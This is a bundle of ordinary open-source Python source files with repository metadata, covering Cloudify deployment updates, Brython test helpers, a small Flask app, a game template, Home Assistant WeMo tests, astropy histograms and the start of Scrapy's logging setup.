file_server_root = config.instance.file_server_root
blueprint_resource_dir = os.path.join(
file_server_root,
'blueprints',
current_app.config[CURRENT_TENANT_CONFIG].name,
blueprint_id)
# The dsl parser expects a URL
blueprint_resource_dir_url = 'file:{0}'.format(blueprint_resource_dir)
app_path = os.path.join(file_server_root, app_dir, app_blueprint)
# parsing the blueprint from here
try:
plan = tasks.parse_dsl(
app_path,
resources_base_path=file_server_root,
additional_resources=[blueprint_resource_dir_url],
**app_context.get_parser_context())
except parser_exceptions.DSLParsingException as ex:
raise manager_exceptions.InvalidBlueprintError(
'Invalid blueprint - {0}'.format(ex))
# Updating the new inputs with the deployment inputs
# (overriding old values and adding new ones)
inputs = copy.deepcopy(deployment.inputs)
inputs.update(additional_inputs)
# applying intrinsic functions
try:
prepared_plan = tasks.prepare_deployment_plan(plan, inputs=inputs)
except parser_exceptions.MissingRequiredInputError, e:
raise manager_exceptions.MissingRequiredDeploymentInputError(
str(e))
except parser_exceptions.UnknownInputError, e:
raise manager_exceptions.UnknownDeploymentInputError(str(e))
deployment_update_id = '{0}-{1}'.format(deployment.id, uuid.uuid4())
deployment_update = models.DeploymentUpdate(
id=deployment_update_id,
deployment_plan=prepared_plan,
created_at=utils.get_formatted_timestamp()
)
deployment_update.set_deployment(deployment)
self.sm.put(deployment_update)
return deployment_update
def create_deployment_update_step(self,
deployment_update_id,
action,
entity_type,
entity_id):
"""Create deployment update step
:param deployment_update_id:
:param action: add/remove/modify
:param entity_type: add/relationship
:param entity_id:
:return:
"""
step = models.DeploymentUpdateStep(
id=str(uuid.uuid4()),
action=action,
entity_type=entity_type,
entity_id=entity_id,
)
deployment_update = self.get_deployment_update(deployment_update_id)
step.set_deployment_update(deployment_update)
return self.sm.put(step)
def extract_steps_from_deployment_update(self, deployment_update):
supported_steps, unsupported_steps = \
step_extractor.extract_steps(deployment_update)
if not unsupported_steps:
for step in supported_steps:
self.create_deployment_update_step(
deployment_update_id=deployment_update.id,
action=step.action,
entity_type=step.entity_type,
entity_id=step.entity_id,
)
# if there are unsupported steps, raise an exception telling the user
# about these unsupported steps
else:
deployment_update.state = STATES.FAILED
self.sm.update(deployment_update)
unsupported_entity_ids = [step.entity_id
for step in unsupported_steps]
raise \
manager_exceptions.UnsupportedChangeInDeploymentUpdate(
'The blueprint you provided for the deployment update '
'contains changes currently unsupported by the deployment '
'update mechanism.\n'
'Unsupported changes: {0}'
.format('\n'.join(unsupported_entity_ids)))
def commit_deployment_update(self,
dep_update,
skip_install=False,
skip_uninstall=False,
workflow_id=None):
"""commit the deployment update steps
:param dep_update:
:param skip_install:
:param skip_uninstall:
:param workflow_id:
:return:
"""
# mark deployment update as committing
dep_update.state = STATES.UPDATING
self.sm.update(dep_update)
# Handle any deployment related changes. i.e. workflows and deployments
modified_deployment_entities, raw_updated_deployment = \
self._deployment_handler.handle(dep_update)
# Retrieve previous_nodes
previous_nodes = \
[node.to_dict() for node in self.sm.list(
models.Node,
filters={'deployment_id': dep_update.deployment_id})]
# Update the nodes on the storage
modified_entity_ids, depup_nodes = \
self._node_handler.handle(dep_update)
# Extract changes from raw nodes
node_instance_changes = self._extract_changes(dep_update,
depup_nodes,
previous_nodes)
# Create (and update for adding step type) node instances
# according to the changes in raw_nodes
depup_node_instances = \
self._node_instance_handler.handle(dep_update,
node_instance_changes)
# Saving the needed changes back to sm for future use
# (removing entities).
dep_update.deployment_update_deployment = raw_updated_deployment
dep_update.deployment_update_nodes = depup_nodes
dep_update.deployment_update_node_instances = depup_node_instances
dep_update.modified_entity_ids = \
modified_entity_ids.to_dict(include_rel_order=True)
self.sm.update(dep_update)
# Execute the default 'update' workflow or a custom workflow using
# added and related instances. Any workflow executed should call
# finalize_update, since removing entities should be done after the
# executions.
# The raw_node_instances are being used only for their ids, Thus
# They should really hold the finished version for the node instance.
execution = self._execute_update_workflow(
dep_update,
depup_node_instances,
modified_entity_ids.to_dict(),
skip_install=skip_install,
skip_uninstall=skip_uninstall,
workflow_id=workflow_id)
dep_update.execution = execution
dep_update.state = STATES.EXECUTING_WORKFLOW
self.sm.update(dep_update)
return self.get_deployment_update(dep_update.id)
def validate_no_active_updates_per_deployment(self,
deployment_id,
force=False):
"""
Validate there are no active updates for provided deployment.
raises conflict error if there are any.
:param deployment_id: deployment id
:param force: force
"""
existing_updates = \
self.list_deployment_updates(filters={
'deployment_id': deployment_id
}).items
active_updates = [u for u in existing_updates if u.state
not in (STATES.SUCCESSFUL, STATES.FAILED)]
if active_updates:
if not force:
raise manager_exceptions.ConflictError(
'there are deployment updates still active; '
'update IDs: {0}'.format(
', '.join([u.id for u in active_updates])))
# real active updates are those with
# an execution in a running status
real_active_updates = \
[u for u in active_updates if u.execution_id is not None and
self.sm.get(models.Execution, u.execution_id).status not in
ExecutionState.END_STATES]
if real_active_updates:
raise manager_exceptions.ConflictError(
'there are deployment updates still active; the "force" '
'flag was used yet these updates have actual executions '
'running update IDs: {0}'.format(
', '.join([u.id for u in real_active_updates])))
else:
# the active updates aren't really active - either their
# executions were failed/cancelled, or the update failed at
# the finalizing stage.
# updating their states to failed and continuing.
for dep_update in active_updates:
dep_update.state = STATES.FAILED
self.sm.update(dep_update)
def _extract_changes(self,
dep_update,
raw_nodes,
previous_nodes):
"""Extracts the changes between the current node_instances and
the raw_nodes specified
:param dep_update:
:param raw_nodes:
:return: a dictionary of modification type and node instanced modified
"""
deployment = self.sm.get(models.Deployment, dep_update.deployment_id)
deployment_id_filter = {'deployment_id': deployment.id}
# By this point the node_instances aren't updated yet
previous_node_instances = \
[instance.to_dict() for instance in
self.sm.list(models.NodeInstance, filters=deployment_id_filter)]
# extract all the None relationships from the depup nodes in order
# to use in the extract changes
no_none_relationships_nodes = copy.deepcopy(raw_nodes)
for node in no_none_relationships_nodes:
node['relationships'] = [r for r in node['relationships'] if r]
# project changes in deployment
changes = tasks.modify_deployment(
nodes=no_none_relationships_nodes,
previous_nodes=previous_nodes,
previous_node_instances=previous_node_instances,
scaling_groups=deployment.scaling_groups,
modified_nodes=()
)
self._patch_changes_with_relationship_index(
changes[NODE_MOD_TYPES.EXTENDED_AND_RELATED],
raw_nodes)
return changes
@staticmethod
def _patch_changes_with_relationship_index(raw_node_instances, raw_nodes):
for raw_node_instance in (i for i in raw_node_instances
if 'modification' in i):
raw_node = next(n for n in raw_nodes
if n['id'] == raw_node_instance['node_id'])
for relationship in raw_node_instance['relationships']:
target_node_id = relationship['target_name']
rel_index = \
next(i for i, d in enumerate(raw_node['relationships'])
if d['target_id'] == target_node_id)
relationship['rel_index'] = rel_index
def _execute_update_workflow(self,
dep_update,
node_instances,
modified_entity_ids,
skip_install=False,
skip_uninstall=False,
workflow_id=None):
"""Executed the update workflow or a custom workflow
:param dep_update:
:param node_instances: a dictionary of modification type and
add_node.modification instances
:param modified_entity_ids: the entire add_node.modification entities
list (by id)
:return:
"""
added_instances = node_instances[NODE_MOD_TYPES.ADDED_AND_RELATED]
extended_instances = \
node_instances[NODE_MOD_TYPES.EXTENDED_AND_RELATED]
reduced_instances = node_instances[NODE_MOD_TYPES.REDUCED_AND_RELATED]
removed_instances = node_instances[NODE_MOD_TYPES.REMOVED_AND_RELATED]
parameters = {
# needed in order to finalize the commit
'update_id': dep_update.id,
# For any added node instance
'added_instance_ids':
extract_ids(added_instances.get(NODE_MOD_TYPES.AFFECTED)),
'added_target_instances_ids':
extract_ids(added_instances.get(NODE_MOD_TYPES.RELATED)),
# encapsulated all the change entity_ids (in a dictionary with
# 'node' and 'relationship' keys.
'modified_entity_ids': modified_entity_ids,
# Any nodes which were extended (positive modification)
'extended_instance_ids':
extract_ids(extended_instances.get(NODE_MOD_TYPES.AFFECTED)),
'extend_target_instance_ids':
extract_ids(extended_instances.get(NODE_MOD_TYPES.RELATED)),
# Any nodes which were reduced (negative modification)
'reduced_instance_ids':
extract_ids(reduced_instances.get(NODE_MOD_TYPES.AFFECTED)),
'reduce_target_instance_ids':
extract_ids(reduced_instances.get(NODE_MOD_TYPES.RELATED)),
# Any nodes which were removed as a whole
'removed_instance_ids':
extract_ids(removed_instances.get(NODE_MOD_TYPES.AFFECTED)),
'remove_target_instance_ids':
extract_ids(removed_instances.get(NODE_MOD_TYPES.RELATED))
}
if not workflow_id:
# Whether or not execute install or uninstall
parameters['skip_install'] = skip_install
parameters['skip_uninstall'] = skip_uninstall
return self._execute_workflow(
deployment_update=dep_update,
workflow_id=workflow_id or DEFAULT_DEPLOYMENT_UPDATE_WORKFLOW,
parameters=parameters)
def finalize_commit(self, deployment_update_id):
""" finalizes the update process by removing any removed
node/node instances and updating any reduced node
:param deployment_update_id:
:return:
"""
dep_update = self.get_deployment_update(deployment_update_id)
# mark deployment update as finalizing
dep_update.state = STATES.FINALIZING
self.sm.update(dep_update)
# The order of these matter
for finalize in [self._deployment_handler.finalize,
self._node_instance_handler.finalize,
self._node_handler.finalize]:
finalize(dep_update)
# mark deployment update as successful
dep_update.state = STATES.SUCCESSFUL
self.sm.update(dep_update)
return self.get_deployment_update(deployment_update_id)
    def _execute_workflow(self,
                          deployment_update,
                          workflow_id,
                          parameters=None,
                          allow_custom_parameters=False,
                          force=False):
        """Start executing *workflow_id* on the update's deployment.

        Validates that the workflow exists on the deployment, merges and
        validates execution parameters, creates a pending Execution model
        attached to the deployment update, and hands the work off to the
        workflow executor.

        :param deployment_update: deployment update object; its
            deployment_id and deployment_plan are read, and its
            ``execution`` attribute is set to the new execution
        :param workflow_id: key into the deployment's workflows mapping
        :param parameters: execution parameters to merge with the
            workflow's declared parameters
        :param allow_custom_parameters: whether parameters not declared by
            the workflow are accepted
        :param force: NOTE(review): accepted but not used in this body --
            confirm whether it should be forwarded to the executor
        :return: the newly created (pending) execution model
        :raises manager_exceptions.NonexistentWorkflowError: if the
            deployment has no workflow named *workflow_id*
        """
        deployment_id = deployment_update.deployment_id
        deployment = self.sm.get(models.Deployment, deployment_id)
        blueprint_id = deployment.blueprint_id
        if workflow_id not in deployment.workflows:
            raise manager_exceptions.NonexistentWorkflowError(
                'Workflow {0} does not exist in deployment {1}'
                .format(workflow_id, deployment_id))
        workflow = deployment.workflows[workflow_id]
        # Merge caller-supplied parameters with the workflow's declaration.
        execution_parameters = \
            ResourceManager._merge_and_validate_execution_parameters(
                workflow, workflow_id, parameters, allow_custom_parameters)
        execution_id = str(uuid.uuid4())
        new_execution = models.Execution(
            id=execution_id,
            status=ExecutionState.PENDING,
            created_at=utils.get_formatted_timestamp(),
            workflow_id=workflow_id,
            error='',
            parameters=ResourceManager._get_only_user_execution_parameters(
                execution_parameters),
            is_system_workflow=False)
        if deployment:
            new_execution.set_deployment(deployment)
        # Link the execution to the update before persisting it.
        deployment_update.execution = new_execution
        self.sm.put(new_execution)
        # executing the user workflow
        workflow_plugins = \
            deployment_update.deployment_plan[
                constants.WORKFLOW_PLUGINS_TO_INSTALL]
        workflow_executor.execute_workflow(
            workflow_id,
            workflow,
            workflow_plugins=workflow_plugins,
            blueprint_id=blueprint_id,
            deployment_id=deployment_id,
            execution_id=execution_id,
            execution_parameters=execution_parameters)
        return new_execution
# What we need to access this manager in Flask
def get_deployment_updates_manager():
    """Return the app-wide DeploymentUpdateManager.

    Lazily instantiates the manager and caches it in the Flask app
    config under the 'deployment_updates_manager' key.
    """
    config = current_app.config
    return config.setdefault('deployment_updates_manager',
                             DeploymentUpdateManager())
|
{
"content_hash": "9dce18c77d2cb2a339efbf58c1a4c6a9",
"timestamp": "",
"source": "github",
"line_count": 514,
"max_line_length": 79,
"avg_line_length": 39.63035019455253,
"alnum_prop": 0.587825233186058,
"repo_name": "isaac-s/cloudify-manager",
"id": "0be56b526929138dabf7e59349a05b397d721c34",
"size": "21013",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rest-service/manager_rest/deployment_update/manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Clojure",
"bytes": "4067"
},
{
"name": "Mako",
"bytes": "541"
},
{
"name": "Python",
"bytes": "1793118"
},
{
"name": "Ruby",
"bytes": "40193"
},
{
"name": "Shell",
"bytes": "41526"
}
],
"symlink_target": ""
}
|
import sys
import time
import tb as traceback
from browser import console
def discover_brython_test_modules():
    """Return the static catalogue of Brython test modules.

    Each entry is a ``(section_label, [(filename, caption), ...])`` pair.
    """
    # TODO : Test discovery based on file system paths
    core = [
        ("test_suite.py", "basic test suite"),
        ("test_rmethods.py", "reflected methods"),
        ("test_bytes.py", "bytes"),
        ("test_classes.py", "classes"),
        ("test_decorators.py", "decorators"),
        ("test_descriptors.py", "descriptors"),
        ("test_dict.py", "dicts"),
        ("test_exec.py", "exec / eval"),
        ("test_generators.py", "generators"),
        ("test_import.py", "imports"),
        ("test_iterators.py", "iterators"),
        ("test_jsobjects.py", "Javascript objects"),
        ("test_list.py", "lists"),
        ("test_memoryview.py", "memoryview"),
        ("test_numbers.py", "numbers"),
        ("test_print.py", "print"),
        ("test_set.py", "sets"),
        ("test_special_methods.py", "special methods"),
        ("test_strings.py", "strings"),
        ("test_fstrings.py", "f-strings"),
        ("test_string_format.py", "string format"),
        ("test_string_methods.py", "string methods"),
    ]
    dom = [
        ("dom.py", "DOM"),
    ]
    issues = [
        ("issues_gc.py", "issues (GC)"),
        ("issues_bb.py", "issues (BB)"),
        ("issues.py", "issues"),
    ]
    modules = [
        ("test_aio.py", "browser.aio"),
        ("test_binascii.py", "binascii"),
        ("test_bisect.py", "bisect"),
        ("test_code.py", "code"),
        ("test_collections.py", "collections"),
        ("test_dataclasses.py", "dataclasses"),
        ("test_datetime.py", "datetime"),
        ("test_decimals.py", "decimals"),
        ("test_functools.py", "functools"),
        ("test_hashlib.py", "hashlib"),
        ("test_itertools.py", "itertools"),
        ("test_json.py", "json"),
        ("test_math.py", "math"),
        ("test_pickle.py", "pickle"),
        ("test_random.py", "random"),
        ("test_re.py", "re"),
        ("test_storage.py", "storage"),
        ("test_struct.py", "struct"),
        ("test_sys.py", "sys"),
        ("test_types.py", "types"),
        ("test_unicodedata.py", "unicodedata"),
        ("test_unittest.py", "unittest"),
        ("test_urllib.py", "urllib"),
        # ("test_indexedDB.py", "indexedDB"),
        # ("test_time.py", "time"),
    ]
    return [
        ("Core language features", core),
        ("DOM interface", dom),
        ("Issues", issues),
        ("Modules", modules),
    ]
def populate_testmod_input(elem, selected=None):
    """Build a multiple selection control including test modules

    Appends one OPTGROUP per test section to *elem*, each filled with one
    OPTION per test module. ``<=`` is Brython's DOM child-append operator.

    NOTE(review): *selected* is used both as a container of section labels
    (``label not in selected``) and compared against a single filename
    (``filenm == selected``) -- confirm the intended type with callers.
    """
    from browser import html
    groups = discover_brython_test_modules()
    for label, options in groups:
        if selected and label not in selected:
            continue
        g = html.OPTGROUP(label=label)
        elem <= g
        for filenm, caption in options:
            if filenm == selected:
                # pre-select the matching module
                o = html.OPTION(caption, value=filenm, selected='')
            else:
                o = html.OPTION(caption, value=filenm)
            g <= o
def run(src, file_path=None):
    """Execute *src* as a __main__ module and time it.

    :param src: source code to execute
    :param file_path: optional path exposed as __file__ to the code
    :return: ``(state, t0, t1, msg)`` where state is 1 on success and 0 on
        failure, t0/t1 are perf_counter timestamps, and msg is the formatted
        traceback ('' on success).
    """
    start = time.perf_counter()
    error_msg = ''
    namespace = {'__name__': '__main__'}
    if file_path is not None:
        namespace['__file__'] = file_path
    try:
        exec(src, namespace)
    except Exception:
        # Report the failure on stderr and flag it in the return value.
        error_msg = traceback.format_exc()
        print(error_msg, file=sys.stderr)
        status = 0
    else:
        status = 1
    end = time.perf_counter()
    return status, start, end, error_msg
def run_test_module(filename, base_path=''):
    """Read a test module from disk and execute it via run().

    :param filename: name of the test file
    :param base_path: optional directory prefix; a trailing '/' is added
        if missing
    :return: the ``(state, t0, t1, msg)`` tuple produced by run()
    """
    if base_path and not base_path.endswith('/'):
        base_path += '/'
    file_path = base_path + filename
    # Close the file deterministically; the original open(...).read()
    # left the handle to be reclaimed by the garbage collector.
    with open(file_path) as fp:
        src = fp.read()
    return run(src, file_path)
|
{
"content_hash": "01962144299c0ad27216c91afd44b581",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 67,
"avg_line_length": 34.19090909090909,
"alnum_prop": 0.5099707524594522,
"repo_name": "kikocorreoso/brython",
"id": "64dcf3669e23da32daf225816ca69f693a5bdc3f",
"size": "3761",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "www/tests/brython_test_utils/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "21158"
},
{
"name": "HTML",
"bytes": "5011615"
},
{
"name": "JavaScript",
"bytes": "7230101"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "19224768"
},
{
"name": "Roff",
"bytes": "21126"
},
{
"name": "VBScript",
"bytes": "481"
}
],
"symlink_target": ""
}
|
# Minimal Flask front-end: serves a single template at the site root.
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
    """Render the landing page template."""
    return render_template('index.html')
if __name__ == '__main__':
    # Listen on all interfaces, port 8000, when run as a script.
    app.run(host='0.0.0.0', port=8000)
|
{
"content_hash": "232aba3b95bf6ad8d3df7513cd572493",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 40,
"avg_line_length": 18.454545454545453,
"alnum_prop": 0.6059113300492611,
"repo_name": "vsilent/smarty-bot",
"id": "97acdbc5df3ddcdaed1a6456e521fde23ee69e46",
"size": "203",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "http/web.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2163"
},
{
"name": "Dockerfile",
"bytes": "741"
},
{
"name": "HTML",
"bytes": "4223"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "974421"
},
{
"name": "Shell",
"bytes": "556"
}
],
"symlink_target": ""
}
|
from swgpy.object import *
def create(kernel):
    """Build the marooned-pirate (female Rodian) creature template."""
    creature = Creature()
    creature.template = "object/mobile/shared_dressed_marooned_pirate_rod_f.iff"
    creature.attribute_template_id = 9
    creature.stfName("npc_name","rodian_base_female")
    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####
    return creature
|
{
"content_hash": "234933c85a4b36ca9dc7d0332253f046",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 75,
"avg_line_length": 24,
"alnum_prop": 0.6987179487179487,
"repo_name": "obi-two/Rebelion",
"id": "a075eae71764f79aead994cd7afb6c801a774487",
"size": "457",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/mobile/shared_dressed_marooned_pirate_rod_f.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
}
|
"""Verify that WeMo device triggers work as expected."""
import pytest
from pywemo.subscribe import EVENT_TYPE_LONG_PRESS
from homeassistant.components.automation import DOMAIN as AUTOMATION_DOMAIN
from homeassistant.components.light import DOMAIN as LIGHT_DOMAIN
from homeassistant.components.wemo.const import DOMAIN, WEMO_SUBSCRIPTION_EVENT
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_DOMAIN,
CONF_ENTITY_ID,
CONF_PLATFORM,
CONF_TYPE,
)
from homeassistant.setup import async_setup_component
from tests.common import (
assert_lists_same,
async_get_device_automations,
async_mock_service,
)
MOCK_DEVICE_ID = "some-device-id"
DATA_MESSAGE = {"message": "service-called"}
@pytest.fixture
def pywemo_model():
    """Pywemo Dimmer models use the light platform (WemoDimmer class)."""
    # NOTE(review): presumably consumed by a shared conftest fixture that
    # builds the mocked WeMo device -- confirm against conftest.py.
    return "Dimmer"
async def setup_automation(hass, device_id, trigger_type):
    """Set up an automation trigger for testing triggering.

    Registers one automation whose device trigger matches
    (*device_id*, *trigger_type*) and whose action calls the
    'test.automation' service with DATA_MESSAGE.
    """
    return await async_setup_component(
        hass,
        AUTOMATION_DOMAIN,
        {
            AUTOMATION_DOMAIN: [
                {
                    "trigger": {
                        CONF_PLATFORM: "device",
                        CONF_DOMAIN: DOMAIN,
                        CONF_DEVICE_ID: device_id,
                        CONF_TYPE: trigger_type,
                    },
                    "action": {
                        "service": "test.automation",
                        "data": DATA_MESSAGE,
                    },
                },
            ]
        },
    )
async def test_get_triggers(hass, wemo_entity):
    """Test that the triggers appear for a supported device."""
    assert wemo_entity.device_id is not None
    # Expect the WeMo long-press trigger plus the light platform's
    # turned_off/turned_on triggers for the same device/entity.
    expected_triggers = [
        {
            CONF_DEVICE_ID: wemo_entity.device_id,
            CONF_DOMAIN: DOMAIN,
            CONF_PLATFORM: "device",
            CONF_TYPE: EVENT_TYPE_LONG_PRESS,
        },
        {
            CONF_DEVICE_ID: wemo_entity.device_id,
            CONF_DOMAIN: LIGHT_DOMAIN,
            CONF_ENTITY_ID: wemo_entity.entity_id,
            CONF_PLATFORM: "device",
            CONF_TYPE: "turned_off",
        },
        {
            CONF_DEVICE_ID: wemo_entity.device_id,
            CONF_DOMAIN: LIGHT_DOMAIN,
            CONF_ENTITY_ID: wemo_entity.entity_id,
            CONF_PLATFORM: "device",
            CONF_TYPE: "turned_on",
        },
    ]
    triggers = await async_get_device_automations(
        hass, "trigger", wemo_entity.device_id
    )
    # Order-insensitive comparison of the trigger descriptions.
    assert_lists_same(triggers, expected_triggers)
async def test_fires_on_long_press(hass):
    """Test wemo long press trigger firing."""
    assert await setup_automation(hass, MOCK_DEVICE_ID, EVENT_TYPE_LONG_PRESS)
    calls = async_mock_service(hass, "test", "automation")
    # Simulate the event the WeMo subscription layer fires on a long press.
    message = {CONF_DEVICE_ID: MOCK_DEVICE_ID, CONF_TYPE: EVENT_TYPE_LONG_PRESS}
    hass.bus.async_fire(WEMO_SUBSCRIPTION_EVENT, message)
    await hass.async_block_till_done()
    # The automation's action ran exactly once with the expected payload.
    assert len(calls) == 1
    assert calls[0].data == DATA_MESSAGE
|
{
"content_hash": "afc3e318ea950a7ee78ad0470f2f436e",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 80,
"avg_line_length": 31.142857142857142,
"alnum_prop": 0.5923984272608126,
"repo_name": "lukas-hetzenecker/home-assistant",
"id": "76016469b727e3ddc0ebdc83816811e8765158c7",
"size": "3052",
"binary": false,
"copies": "5",
"ref": "refs/heads/dev",
"path": "tests/components/wemo/test_device_trigger.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2443"
},
{
"name": "Python",
"bytes": "38023745"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
}
|
"""Stub file to maintain backwards compatibility."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import,unused-import
from tensorflow.python.tpu.error_handling import *
# pylint: enable=wildcard-import,unused-import
|
{
"content_hash": "334590813a7da48a58f4e43d4d1988de",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 52,
"avg_line_length": 34.44444444444444,
"alnum_prop": 0.7806451612903226,
"repo_name": "jbedorf/tensorflow",
"id": "1b1328b4075d9a737e40693c13e33e0b7c1fbedf",
"size": "995",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/tpu/python/tpu/error_handling.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3560"
},
{
"name": "Batchfile",
"bytes": "14734"
},
{
"name": "C",
"bytes": "647467"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "59799751"
},
{
"name": "CMake",
"bytes": "207169"
},
{
"name": "Dockerfile",
"bytes": "75509"
},
{
"name": "Go",
"bytes": "1508512"
},
{
"name": "HTML",
"bytes": "4680118"
},
{
"name": "Java",
"bytes": "908330"
},
{
"name": "Jupyter Notebook",
"bytes": "2510253"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "94633"
},
{
"name": "Objective-C",
"bytes": "60069"
},
{
"name": "Objective-C++",
"bytes": "118322"
},
{
"name": "PHP",
"bytes": "15108"
},
{
"name": "Pascal",
"bytes": "770"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "46379626"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "838"
},
{
"name": "Shell",
"bytes": "480235"
},
{
"name": "Smarty",
"bytes": "27249"
},
{
"name": "Swift",
"bytes": "53109"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, unicode_literals
import numpy as np
from ..stats import histogram
from ..utils.compat.funcsigs import signature
__all__ = ['hist']
def hist(x, bins=10, ax=None, **kwargs):
    """Enhanced histogram function.

    A drop-in replacement for ``pylab.hist`` that additionally accepts a
    string ``bins`` argument selecting a more sophisticated binning
    algorithm. Ported from astroML: http://astroML.org/

    Parameters
    ----------
    x : array_like
        array of data to be histogrammed
    bins : int or list or str (optional)
        If bins is a string, then it must be one of:
        - 'blocks' : use bayesian blocks for dynamic bin widths
        - 'knuth' : use Knuth's rule to determine bins
        - 'scott' : use Scott's rule to determine bins
        - 'freedman' : use the Freedman-diaconis rule to determine bins
    ax : Axes instance (optional)
        specify the Axes on which to draw the histogram. If not specified,
        then the current active axes will be used.
    **kwargs :
        other keyword arguments are described in ``plt.hist()``.

    Notes
    -----
    Return values are the same as for ``plt.hist()``

    See Also
    --------
    astropy.stats.histogram
    """
    # Only np.histogram's own keyword arguments (everything after the data
    # argument) are forwarded to astropy.stats.histogram.
    np_hist_keys = list(signature(np.histogram).parameters.keys())[1:]
    forwarded = {key: kwargs[key] for key in np_hist_keys if key in kwargs}
    # Compute the bin edges up front, then let matplotlib draw with them.
    counts, bins = histogram(x, bins, **forwarded)
    if ax is None:
        # optional dependency; only import if strictly needed.
        import matplotlib.pyplot as plt
        ax = plt.gca()
    return ax.hist(x, bins, **kwargs)
|
{
"content_hash": "5bc20394d10817dccd62fee6247602ea",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 79,
"avg_line_length": 30.360655737704917,
"alnum_prop": 0.6538876889848813,
"repo_name": "kelle/astropy",
"id": "3f5248588f6a29204d7eca3c64edb13a6c300688",
"size": "1917",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "astropy/visualization/hist.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "366877"
},
{
"name": "C++",
"bytes": "1825"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Jupyter Notebook",
"bytes": "62553"
},
{
"name": "Python",
"bytes": "8072264"
},
{
"name": "Shell",
"bytes": "446"
},
{
"name": "TeX",
"bytes": "778"
}
],
"symlink_target": ""
}
|
import sys
import logging
import warnings
from logging.config import dictConfig
from twisted.python.failure import Failure
from twisted.python import log as twisted_log
import scrapy
from scrapy.settings import overridden_settings, Settings
from scrapy.exceptions import ScrapyDeprecationWarning
logger = logging.getLogger(__name__)
def failure_to_exc_info(failure):
    """Extract exc_info from Failure instances

    Returns a ``(type, value, traceback)`` tuple suitable for logging's
    ``exc_info`` argument, or None (implicitly) when *failure* is not a
    twisted ``Failure``.
    """
    if isinstance(failure, Failure):
        return (failure.type, failure.value, failure.getTracebackObject())
class TopLevelFormatter(logging.Filter):
    """Collapse child logger names down to their top-level ancestor.

    Rewrites e.g. 'scrapy.core.engine' to 'scrapy' on matching records,
    mimicking the old Scrapy log behaviour and shortening long names.
    A filter set on one logger does not propagate to its children, so
    this is meant to be attached to the root handler, parametrized with
    the `loggers` prefixes it should act on.
    """
    def __init__(self, loggers=None):
        self.loggers = loggers or []

    def filter(self, record):
        name = record.name
        if any(name.startswith(prefix + '.') for prefix in self.loggers):
            record.name = name.split('.', 1)[0]
        # Never drop the record; we only rewrite its logger name.
        return True
# Baseline config passed to dictConfig() in configure_logging():
# scrapy loggers emit from DEBUG up, twisted only from ERROR up.
DEFAULT_LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,  # keep pre-existing loggers active
    'loggers': {
        'scrapy': {
            'level': 'DEBUG',
        },
        'twisted': {
            'level': 'ERROR',
        },
    }
}
def configure_logging(settings=None, install_root_handler=True):
    """
    Initialize logging defaults for Scrapy.
    :param settings: settings used to create and configure a handler for the
        root logger (default: None).
    :type settings: dict, :class:`~scrapy.settings.Settings` object or ``None``
    :param install_root_handler: whether to install root logging handler
        (default: True)
    :type install_root_handler: bool
    This function does:
    - Route warnings and twisted logging through Python standard logging
    - Assign DEBUG and ERROR level to Scrapy and Twisted loggers respectively
    - Route stdout to log if LOG_STDOUT setting is True
    When ``install_root_handler`` is True (default), this function also
    creates a handler for the root logger according to given settings
    (see :ref:`topics-logging-settings`). You can override default options
    using ``settings`` argument. When ``settings`` is empty or None, defaults
    are used.
    """
    if not sys.warnoptions:
        # Route warnings through python logging, unless the user is already
        # controlling warnings via -W command-line options.
        logging.captureWarnings(True)
    # Forward twisted's log messages into the stdlib 'twisted' logger.
    observer = twisted_log.PythonLoggingObserver('twisted')
    observer.start()
    dictConfig(DEFAULT_LOGGING)
    if isinstance(settings, dict) or settings is None:
        settings = Settings(settings)
    if settings.getbool('LOG_STDOUT'):
        # Redirect stdout writes into the 'stdout' logger.
        sys.stdout = StreamLogger(logging.getLogger('stdout'))
    if install_root_handler:
        install_scrapy_root_handler(settings)
def install_scrapy_root_handler(settings):
    """Install (or replace) Scrapy's handler on the root logger.

    The installed handler is cached in the module-level
